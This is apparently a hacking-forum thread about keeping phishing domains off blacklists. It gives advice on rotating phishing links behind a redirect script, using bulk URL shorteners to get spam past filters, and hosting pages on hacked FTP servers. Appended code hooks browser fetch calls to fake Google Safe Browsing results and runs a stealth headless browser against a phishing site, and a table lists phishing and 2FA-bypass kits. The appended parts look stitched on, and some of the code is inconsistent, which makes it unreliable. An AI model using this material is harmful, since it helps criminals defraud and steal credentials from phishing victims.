neo da matrix
RIPPER
- Messages
- 115
- Reaction score
- 7
- Points
- 18
anyone got an idea or method of doing this? my domains get blacklisted really quick...probably in 1 or 2 hours....please share any solution you might have 
I'll try to explain what I used to do.
So I had the redirect script, which checks if the site is up or down. Upload the script on a host, and paste your phisher links there. So if say site 1 is down, it checks site 2 and so on. Ok, that's not the case, but, what you have to do is check manually the first link on the script, and if it's reported, delete it from the list, the link 2 is gona be ok for a while, and so on..
Now, to avoid the redirect link being reported, you have to buy many shortened (redirect) links for it (costs around 10$ for 1k), and make sure the redirect script is on fast host, so it doesn't show up for the victim.
That's only gona work if you spam with webmailer, where you have an option for text randomisation. So using many shortened urls is also an advantige for your spam, less chances being picked up by spam filters.
Hopefully you understood what i was trying to say
Also, the redirect script is easy to make if you know php, if you don't, find someone who does, it's not a biggie.
Neo get back to me and I will finish the script for you.
I would recommend uploading the phishing page to a bounce of hosts or hacked ftp's.
Regards
IP=$(curl -s ipify.org); echo "http://${IP//./,}/path" | sed 's/,/./g' # Comma-dot swap for evasion
// content_script.js - Inject via extension
const originalFetch = window.fetch;
window.fetch = async (...args) => {
if (args[0].includes('safebrowsing.googleapis.com')) {
return new Response(JSON.stringify({threatType: 'UNSAFE', threat: {url: 'safe.example.com'}}), {status: 200});
}
return originalFetch(...args);
};
// Add to manifest.json: "content_scripts": [{"matches": ["<all_urls>"], "js": ["content_script.js"]}]
// puppeteer-extra with stealth plugin
const puppeteer = require('puppeteer-extra');
const StealthPlugin = require('puppeteer-extra-plugin-stealth');
puppeteer.use(StealthPlugin());
const browser = await puppeteer.launch({headless: false, args: ['--disable-blink-features=AutomationControlled']});
const page = await browser.newPage();
await page.evaluateOnNewDocument(() => {
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
// Spoof safebrowsing callback
window.__gCrWeb.safeBrowsing = {checkUrl: () => Promise.resolve({safe: true})};
});
await page.goto('http://yourphish.com');
// @match *://*/*
if (location.href.includes('safebrowsing')) { location.replace('about:blank'); }
| Tool | Type | Key Feature | 2025 Update | Cost |
|---|---|---|---|---|
| Evilginx3 | MITM | 2FA Bypass | Phishlet gen for new banks | Free |
| Gophish 0.12 | Campaign | Template obfuscator | AI landing page morphing | Free |
| SET 9.0 | Toolkit | URL cloner | WASM support for mobile | Free |
| Burp Suite Pro | Proxy | Decoder+Intruder | ML fuzzing for filters | $399/yr |
| Octo Browser | Anti-Detect | Fingerprint spoof | 2025 tracking evasion | $29/mo |
| HiddenEye 2.5 | Kit | One-click | Onion integration | Free |
